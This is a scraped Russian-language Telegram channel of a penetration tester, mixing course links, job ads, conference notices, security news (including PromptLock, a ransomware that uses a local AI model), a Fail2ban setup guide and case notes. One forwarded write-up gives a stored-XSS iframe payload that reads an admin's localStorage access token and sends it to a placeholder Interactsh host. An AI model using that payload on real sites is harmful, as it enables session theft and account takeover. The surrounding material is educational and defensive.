Web Application Penetration Testing Course URLs.docx
30.4 KB
🔥 Вечерняя подборочка
Чем можно ещё заниматься поздним вечером? Правильно — искать для вас контентик. Материал ценен для новичков и тех, кто желает освежить память. Здесь подборка ссылок на различные источники с обучающей информацией по веб-пентесту.
▎ Содержимое материала:
> History;
> Web and Server Technology;
> Setting up the lab with BurpSuite and bWAPP;
> Mapping the application and attack surface;
> Understanding and exploiting OWASP top 10 vulnerabilities;
> Session management testing;
> Bypassing client-side controls;
> Attacking authentication/login;
> Attacking access controls (IDOR, Priv esc, hidden files and directories);
> Attacking Input validations (All injections, XSS and mics);
> Generating and testing error codes;
> Weak cryptography testing;
> Business logic vulnerability.
#материал
Чем можно ещё заниматься поздним вечером? Правильно — искать для вас контентик. Материал ценен для новичков и тех, кто желает освежить память. Здесь подборка ссылок на различные источники с обучающей информацией по веб-пентесту.
▎ Содержимое материала:
> History;
> Web and Server Technology;
> Setting up the lab with BurpSuite and bWAPP;
> Mapping the application and attack surface;
> Understanding and exploiting OWASP top 10 vulnerabilities;
> Session management testing;
> Bypassing client-side controls;
> Attacking authentication/login;
> Attacking access controls (IDOR, Priv esc, hidden files and directories);
> Attacking Input validations (All injections, XSS and mics);
> Generating and testing error codes;
> Weak cryptography testing;
> Business logic vulnerability.
#материал
Forwarded from Path Secure (CuriV)
Привет-привет!
Ищу к нам в команду опытного специалиста для самостоятельного выполнения проектов по пентесту внешки/внутрянки. Для некоторых самоуправление является бременем, а для кого-то благодатью. Если интересно, то откликайтесь!
Вот здесь немного о том, в какой парадигме мы живем:
https://xn--r1a.website/pathsecure/370
Далее заголовок вакансии:
У нас необычный и интересный формат конкурсного собеседования, который уже был опробирован на других позициях :)
Детали здесь:
https://hh.ru/vacancy/123321284
Контакт для связи с HR:
@marina_du
Всем хорошего дня!
Ищу к нам в команду опытного специалиста для самостоятельного выполнения проектов по пентесту внешки/внутрянки. Для некоторых самоуправление является бременем, а для кого-то благодатью. Если интересно, то откликайтесь!
Вот здесь немного о том, в какой парадигме мы живем:
https://xn--r1a.website/pathsecure/370
Далее заголовок вакансии:
Мы —первый в России производственный кооператив в сфере ИБ, где нет бюрократии, зато есть свобода действий, энергия стартапа и команда, которая ценит экспертизу и обмен знаниями.
Кого мы ищем?
Специалиста, который заинтересован работать в неформальных коллективах или осознает, что подготовлен к нему и мечтает преодолеть отчуждение крупных корпораций и классических фирм, чтобы попасть именно в такой, даже ценой комфорта и безопасности.
Подумайте, пожалуйста, готовы ли Вы к такому и нужно ли это именно Вам на данном этапе жизни и эволюции?
У нас необычный и интересный формат конкурсного собеседования, который уже был опробирован на других позициях :)
Как устроено наше сотрудничество?
Вы откликаетесь на вакансию.
1) Мы проводим предварительный отбор резюме и просим выполнить небольшое задание по профилю вакансии.
2) Отобранные кандидаты приглашаются на неформальное онлайн-знакомство (обсуждаем соответствие по ценностям нашего кооператива и предлагает пройти тестовую игру для синхронизации, проявляемся, задаем друг другу вопросы, погружаемся в культуру).
3) Голосуем внутри за кандидатов на основе записи встречи-знакомства.
4) HR дообсуждает с выбранными кандидатами условия (уже 1-1).
5) С финальным списком отобранных товарищей проводим онлайн психометрический тест (ПИФ Экопси: измеряет аналитические способности, открытость изменениям, способность доводить дело до конца, лидерские качества).
6) Принимаем окончательное решение по предложению наиболее подходящему, на наш взгляд, кандидату и синхронизируемся с ним по договоренностям.
Нам не нужно «идеальное» резюме. Ценим искренность, стремление эффективно доводить проекты до согласованного результата, реальные компетенции и готовность к диалогу и ответственности за взятые на себя обязательства.
Детали здесь:
https://hh.ru/vacancy/123321284
Контакт для связи с HR:
@marina_du
Всем хорошего дня!
Telegram
Path Secure
Хочу поделиться радостью от успешной реализации социального института!
Примерно год назад я задумался, что нам в кооперативе RAD COP жизненно необходимо создать процесс системной подготовки будущих товарищей пентестеров. Причем под системностью я понимаю…
Примерно год назад я задумался, что нам в кооперативе RAD COP жизненно необходимо создать процесс системной подготовки будущих товарищей пентестеров. Причем под системностью я понимаю…
❤10
ZeroNights, тихо затаившаяся с 2021 года, возвращается в 2025!
Конференция по информационной безопасности объявляет Call for Papers и открывает приём заявок на доклады. ZeroNights собирает специалистов, чтобы делиться практическими исследованиями, кейсами и опытом с активным комьюнити.
▎ Интересуют доклады:
Заявки принимаются до 12 октября 2025. Продолжительность доклада — 30 или 45 минут.
Подробности и форма подачи доступны на сайте конференции.
Смело делитесь своим опытом и исследованиями! 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
Закончился мой потрясающий отпуск, возвращаюсь к созданию контента.
Сложа руки не сидел, вместе с коллегой делали классный инструмент для 100% пассивной разведки на внешнем периметре. Сейчас он готов для локального использования, но у меня есть планы опубликовать его на этом канале. Как только всё сложится и будет готово, обязательно сообщу!
Всем добра)
Please open Telegram to view this post
VIEW IN TELEGRAM
12🔥15❤8
ЦБ назвал признаки мошеннических операций при снятии наличных в банкоматах: если операция выглядит подозрительной, банк введёт временный лимит на снятие наличных — максимум 50 тыс. руб. в сутки на 48 часов. Больше — только через отделение.
▎ Что может насторожить банк:
Последний признак в данном списке будет применяться с 1 марта 2026 года. Все остальные признаки — с 1 сентября 2025 года.
Фактически банк строит поведенческую модель клиента и сравнивает её с текущими действиями. Если есть отклонения — вводится защита от возможного социального инжиниринга: ситуации, когда мошенники убеждают человека снять и отдать деньги.
#новость
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11 4
Специалисты из ESET сообщили об обнаружении первого AI-вымогателя PromptLock. Вредоносное ПО работает необычно: оно не хранит заранее прописанный код, а запускает у жертвы локальную модель GPT-OSS:20B, которая прямо на лету генерирует скрипты на языке Lua.
▎ Что эти скрипты умеют:
Сам вирус написан на Go, работает и на Windows, и на Linux, и на macOS. Его особенность — очень маленький размер на этапе заражения: всё "умное" поведение подгружается уже потом, за счёт LLM.
ESET считает, что пока это скорее прототип, чем реально развернутая атака. Но факт остаётся фактом: это первый случай, когда малварь использует генеративный ИИ локально, а не в облаке.
Почему это тревожно?
▎ Такая схема даёт вредоносу:
PromptLock — скорее "первый звонок", чем массовая угроза. Но очевидно, что в будущем ИБ-специалистам придётся противостоять не только хакерам, но и их "искусственным помощникам".
Теперь мы официально вошли в эпоху, где твой ноутбук может сам себе придумать, как именно тебя ограбить.
#новость
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RAD COP
Как защитить бизнес от хакеров, шифровальщиков, утечек и потери работоспособности
3 сентября специалисты по анализу защищенности РАД КОП расскажут об информационной безопасности на примерах распространённых уязвимостей из собственной практики пентестов (или, как принято говорить в отечественных стандартах, тестирования на проникновение).
🎙 Вебинар пройдет в формате диалога, будет наполнен практическими кейсами и инсайтами.
Вебинар поможет заинтересованным участникам найти свой ответ на вопрос: зачем нужна информационная безопасность, как устроены распространенные хакерские атаки и что можно сделать, чтобы не пополнить ряды тех, кто был «зашифрован», столкнулся с утечкой персональных данных клиентов или привлек внимание правоохранительных органов.
↕️ Что обсудим:
— Краткий ликбез по ключевым терминам, ИТ и ИБ концепциям, которые определяют контекст хакерских атак и их последствий для собственников, государства, пользователей/клиентов/сотрудников;
— Уязвимости API и логики работы веб-приложений, которые статистически часто лежат в основе успешных атак и приводят к утечкам данных, нарушениям работоспособности организаций;
— Социальную инженерию, сценарии которой задействованы в половине корпоративных атак, включая целевой фишинг и мошенничество с установлением физического контакта с жертвой;
— Защищённость внутреннего периметра: локальная сеть и инфраструктура организации, которые могут быть недоступны извне, и в атаках на которые часто играют свою роль инсайдеры и безалаберные сотрудники с удаленным доступом;
— Первопричины и риски, которые стоят за этими уязвимостями, как через подход «люди-процессы-технологии» можно приоритезировать соответствующие задачи, и в чем сходство управления уязвимостями и тайм-менеджмента.
⚙️ Вы научитесь:
— Базовым терминам и ключевым концепциям ИТ и ИБ необходимым для понимания проблематики компьютерных атак;
— Распознавать ключевые уязвимости и их первопричины;
— Оценивать риски, которые несут конкретные сценарии атак;
— Выстраивать внутренние процессы, чтобы снизить уязвимость и повысить устойчивость.
🤝 Кому полезен вебинар:
Техническим специалистам блоков ИТ и ИБ, топ-менеджменту и собственникам организаций, иным лицам интересующимся в информационной безопасности, которые хотят лучше разбираться в проблематике хакерских атак, рисков, в сценариях нападения и методологии выстраивания защиты через приоритезацию и управление.
Дата и время: 3 сентября 17.00
Ссылка для регистрации — https://my.mts-link.ru/j/tmliga/2728011485
Присоединяйтесь, если готовы трансформировать проблемы в преимущества ваших организаций вместе с РАД КОП🤝
#Вебинар #Пентест
3 сентября специалисты по анализу защищенности РАД КОП расскажут об информационной безопасности на примерах распространённых уязвимостей из собственной практики пентестов (или, как принято говорить в отечественных стандартах, тестирования на проникновение).
Вебинар поможет заинтересованным участникам найти свой ответ на вопрос: зачем нужна информационная безопасность, как устроены распространенные хакерские атаки и что можно сделать, чтобы не пополнить ряды тех, кто был «зашифрован», столкнулся с утечкой персональных данных клиентов или привлек внимание правоохранительных органов.
— Краткий ликбез по ключевым терминам, ИТ и ИБ концепциям, которые определяют контекст хакерских атак и их последствий для собственников, государства, пользователей/клиентов/сотрудников;
— Уязвимости API и логики работы веб-приложений, которые статистически часто лежат в основе успешных атак и приводят к утечкам данных, нарушениям работоспособности организаций;
— Социальную инженерию, сценарии которой задействованы в половине корпоративных атак, включая целевой фишинг и мошенничество с установлением физического контакта с жертвой;
— Защищённость внутреннего периметра: локальная сеть и инфраструктура организации, которые могут быть недоступны извне, и в атаках на которые часто играют свою роль инсайдеры и безалаберные сотрудники с удаленным доступом;
— Первопричины и риски, которые стоят за этими уязвимостями, как через подход «люди-процессы-технологии» можно приоритезировать соответствующие задачи, и в чем сходство управления уязвимостями и тайм-менеджмента.
— Базовым терминам и ключевым концепциям ИТ и ИБ необходимым для понимания проблематики компьютерных атак;
— Распознавать ключевые уязвимости и их первопричины;
— Оценивать риски, которые несут конкретные сценарии атак;
— Выстраивать внутренние процессы, чтобы снизить уязвимость и повысить устойчивость.
Техническим специалистам блоков ИТ и ИБ, топ-менеджменту и собственникам организаций, иным лицам интересующимся в информационной безопасности, которые хотят лучше разбираться в проблематике хакерских атак, рисков, в сценариях нападения и методологии выстраивания защиты через приоритезацию и управление.
Дата и время: 3 сентября 17.00
Ссылка для регистрации — https://my.mts-link.ru/j/tmliga/2728011485
Присоединяйтесь, если готовы трансформировать проблемы в преимущества ваших организаций вместе с РАД КОП
#Вебинар #Пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7 4 3❤1
Несколько дней подряд мой сервер обстреливали запросами с разных IP. Узнал я об этом совершенно случайно, когда зашёл через SSH по другой причине и решил посмотреть логи. И тут я просто выпал.
Какой-то упёртый товарищ через веб-страницу долбил админку одного сервиса из трёх букв (название опустим, но суть поняли), пытаясь перебрать логины и пароли. Причём без капли стеснения он это делал с 30 запросами в секунду (108к запросов в час). Продолжалось это без остановки с 28 августа 04:09:44 по 2 сентября 12:33:35, а далее затишье.
Я сразу решил, что так оставлять нельзя. Вечером того же дня поставил Fail2ban, прописал фильтр и подключил его к логам. И, как по заказу, атакующий снова вылез 2-го сентября в 23:07:56. Но на этот раз всё закончилось для него быстро и печально. Даже секунды не прошло, как IPS повязал ему ручонки (см. скриншот). Ну и я подумал, что из этого можно было бы выкатить простой гайд по установке и настройке Fail2ban.
Fail2Ban – программа для защиты серверов от атак методом грубой силы.
Если кому интересно, как настроить Fail2ban в пару кликов под X-UI (как в моём случае), держите гайд.
sudo apt update
sudo apt install fail2ban -y
fail2ban-client --version
sudo systemctl enable --now fail2ban
sudo systemctl status fail2ban
[Definition]
failregex = WARNING - wrong username: ".*", password: ".*", secret: ".*", IP: "<HOST>"
ignoreregex =
Вставляем как есть, ничего менять не надо.
[x-ui]
enabled = true
filter = x-ui
logpath = /var/log/kern.log
maxretry = 5
findtime = 600
bantime = 3600
action = iptables[name=x-ui, port=PORT, protocol=tcp]
ignoreip = 127.0.0.1/8 YOUR_IP YOUR_VPN_IP
Пояснение:
logpath — файл с логами, куда пишутся предупреждения о неверно введённом логине/пароле.
port=PORT — сетевой порт, к которому будет применяться правило блокировки IP через iptables. Здесь ставьте порт, на котором открывается форма авторизации в личный кабинет X-UI.
maxretry = 5 — после 5+ провальных попыток выдаётся бан.
findtime = 600 — считаем попытки за 10 минут.
bantime = 3600 — бан на 1 час.
ignoreip — добавляем сюда свой IP и VPN, чтобы случайно не заблокироваться.
sudo systemctl restart fail2ban
sudo systemctl status fail2ban
Теперь можно отслеживать статус Fail2ban, в котором в том числе пишется количество блокировок и какие именно IP-адреса были заблокированы:
sudo fail2ban-client status x-ui
Защищайте свои сервера и будьте здоровы! 😉
И не забудьте перевернуть календарь.
Please open Telegram to view this post
VIEW IN TELEGRAM
1 19🔥11👍9❤🔥1
8 сентября 2025 года Aikido Security сообщила о крупнейшей supply-chain атаке на JavaScript. Всё началось с фишингового письма: злоумышленники угнали аккаунт мейнтейнера npm и выложили заражённые версии 18 ключевых пакетов. Суммарно их скачивают более 2,6 млрд раз в неделю.
Вредоносный код срабатывал только в браузере и перехватывал Web3-трафик.
▎ Что делал вредонос:
Иными словами — крипто-клиппер прямо внутри зависимостей, которые стоят почти в каждом проекте.
▎ Список подтверждённых заражённых версий:
▎ Что делать разработчикам прямо сейчас:
Даже одно фишинговое письмо способно обернуться катастрофой для всей экосистемы.
Не ведитесь на фишинги!
#новость
Please open Telegram to view this post
VIEW IN TELEGRAM
Исследователи из Калифорнийского университета в Ирвайне представили атаку Mic-E-Mouse, которая позволяет превратить обычную геймерскую мышь в инструмент подслушивания.
Суть атаки в том, что движения и вибрации поверхности, считываемые сенсором мыши, могут быть преобразованы в звуковые колебания. Устройство начинает фиксировать микровибрации, создаваемые речью пользователя, фактически работая как грубый микрофон.
Поначалу полученный сигнал имеет низкое качество, но исследователи применили последовательную обработку данных и алгоритмы машинного обучения, чтобы очистить шум и восстановить разборчивую речь.
Для эксперимента использовались стандартная мышь и открытые наборы речевых данных VCTK и AudioMNIST. Команда добилась увеличения отношения сигнал/шум на 19 дБ, улучшила точность автоматического распознавания говорящего на 80%, а в тестах с людьми коэффициент ошибок составил 16,79% — результат, достаточный для различимого восприятия речи.
По мнению исследователей, наибольший риск представляют мыши с сенсорами 20000 DPI и выше. В качестве целей особенно уязвимы видеоигры и другое производительное ПО: там внедрение эксплойта можно замаскировать под сетевую активность игры, не вызывая подозрений.
#новость
Please open Telegram to view this post
VIEW IN TELEGRAM
5 15😱5🤯4 1
Больше года с нетерпением ожидал новый список топовых уязвимостей от OWASP. Для веба они выходят раз в 3-4 года, начиная с 2003 года. В рейтинге десяти самых распространённых за 2025 год появились две новые категории и одна консолидированная. Список предварительный (кандидат), окончательный будет чуть позже.
▎ Новые топовые уязвимости:
▎ Что это значит для пентестеров и разработчиков?
Распространите новый топ OWASP.
И да, ИБ спецы, с проф праздником вас!
UPD. Это кандидат на окончательное утверждение топа.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤22 7😍5🍾1
Zeronights подогревает интерес! Стартовала публикация докладов программы на 2025 год.
Напоминаю, что организаторы выкатывают описания выступлений с двух ключевых треков: Offensive и SecOps.
▎ Лично мне бы первым делом хотелось послушать доклады про веб и внешнюю инфру в целом:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥9 6
Forwarded from Fail Auth
HTML Injection → Stored XSS → Hijack accessToken
Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации.
Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов.
Решил проверить — вставил простой HTML:
Текст стал крупнее — значит innerHTML или подобная конструкция.
Далее потестировал теги:
Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу➡️ отображается в админке ➡️ возникает вопрос: можно ли это раскрутить до XSS?
➡️ Рабочий XSS-пэйлоад:
В данном случае он читает токен из localStorage и вызывает alert() с его значением.
Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой.
➡️ Эскалация XSS:
Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена.
Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта.
➡️ Особенность уязвимости теги:
➡️ Что это даёт:
➡️ Советы для тестирования:
Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации.
Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов.
Решил проверить — вставил простой HTML:
<h1>Test</h1> <!-- изменение размера шрифта -->
Текст стал крупнее — значит innerHTML или подобная конструкция.
Далее потестировал теги:
<img src="x"> <!-- битая картинка -->
<input> <!-- лишний input на странице -->
Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу
<iframe src="javascript:alert(localStorage.accessToken)"></iframe>
В данном случае он читает токен из localStorage и вызывает alert() с его значением.
Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой.
<iframe src="javascript:fetch('//your.interact.sh?token=' + localStorage.accessToken)"></iframe>Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена.
Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта.
🔴 Инъекция сохраняется в БД (Stored)🔴 Отрабатывает на стороне администратора🔴 Через XSS читается accessToken из localStorage
🔴
Захват токена администратора
🔴
Возможность делать запросы от его имени
🔴
Потенциальный full access к admin-панели
🔴
Ищите HTML-теги, которые влияют на DOM (текст, форма, медиа)
🔴
Проверяйте innerHTML, outerHTML, dangerouslySetInnerHTML в React
🔴
Тестируйте на img, input, iframe, svg, math, script и template
🔴
Не ограничивайтесь alert(1), пробуйте localStorage, fetch, document.cookie, navigator, location
🔴
Используйте Interactsh, Burp Collaborator, xsshunter для подтверждения уязвимости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17 5❤4😎1
Недавно на проекте по пентесту было обнаружено уязвимое коробочное решение Directus v9.23.3.
Directus — это open‑source платформа для управления данными, которая превращает любую SQL‑базу в headless CMS, предоставляя автоматическую REST и GraphQL API и удобный веб-интерфейс для управления контентом.
С таким ПО я столкнулся впервые, поэтому принялся ресёрчить все возможные там API-эндпоинты, файловую структуру и искать уже известные уязвимости (CVE).
Первым делом встала задача определить версию Directus. Немного покопавшись в интернете, обнаружился эндпоинт, раскрывающий версию ПО в одной из констант JS-файла по пути "/admin/assets/...js":
const jN="9.23.3"
Это позволило отсортировать все CVE под данную версию.
Уязвимостей было обнаружено полно, но в рамках этого поста хочу акцентировать внимание на ключевой, которую обнаружил сам, — загрузка любых файлов в админскую Библиотеку файлов без аутентификации + раскрытие списка файлов на эндпоинте /files. Получить доступ к любому файлу можно, зная его ID. После загрузки файлу автоматически присваивается идентификатор, и он становится доступен по публичному URL вида /assets/<ID>.
▎ Риски:
▎ Рекомендации по устранению уязвимостей:
▎ Для пентестеров, обнаруживших Directus в проде:
Часть уязвимостей в списках CVE эксплуатируется только при наличии сессии — это отличный кейс для серого ящика. На этом проекте я как раз работал по методикам чёрного и серого ящика.
UPD. Оказывается, это не уязвимость в самой коробке, а просто мисконфиг на проекте, допускающий загрузку файлов без аутентификации.
#кейс #материал
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14👍8 2😱1
Ровно год назад, 29 ноября 2024 года, появился канал "Пентестер на мотоцикле", и благодаря вам он продолжает расти! Ваш интерес это лучший стимул двигаться дальше, писать больше и делиться полезным!
Спасибо каждому за подписку, активность и поддержку — именно вы делаете этот проект живым.
Дальше только интереснее!
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍26❤🔥16 7 5
Коллеги, всех с международным днем защиты информации!
Желаю всем крепких паролей и спокойной инфраструктуры.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤24🔥6 4 1
4 декабря пройдёт Ежегодная аналитическая конференция "КОД ИБ | ИТОГИ 2025", в которой я буду принимать участие в качестве спикера.
Приду с темой "Цена лишнего факта: как неосознанные утечки бьют по прибыли", чтобы обратить внимание на скрытые риски, с которыми бизнес сталкивается каждый день, часто даже не замечая их.
Разберём, почему такие мелочи стоят бизнесу реальных денег и как не допустить утечек, которые открывают злоумышленникам дверь во внутрь.
Если будете на конференции — буду рад с вами встретиться и пообщаться)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍7 5
Пришло время подводить итоги года канала "Пентестер на мотоцикле"!
В этом мне сильно помог бот TGStat. Если хотите такую же статистику для своего канала, то отправьте боту @TGStat_Bot сообщение типа "2025 @username".
От себя добавлю: 2025 год оказался переломным в моей жизни: крутая карьера и хоть какая-то начальная известность в своих кругах. Много экспериментов, роста и правильных поворотов. Дальше — больше.
Всех с наступающим!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍4😍2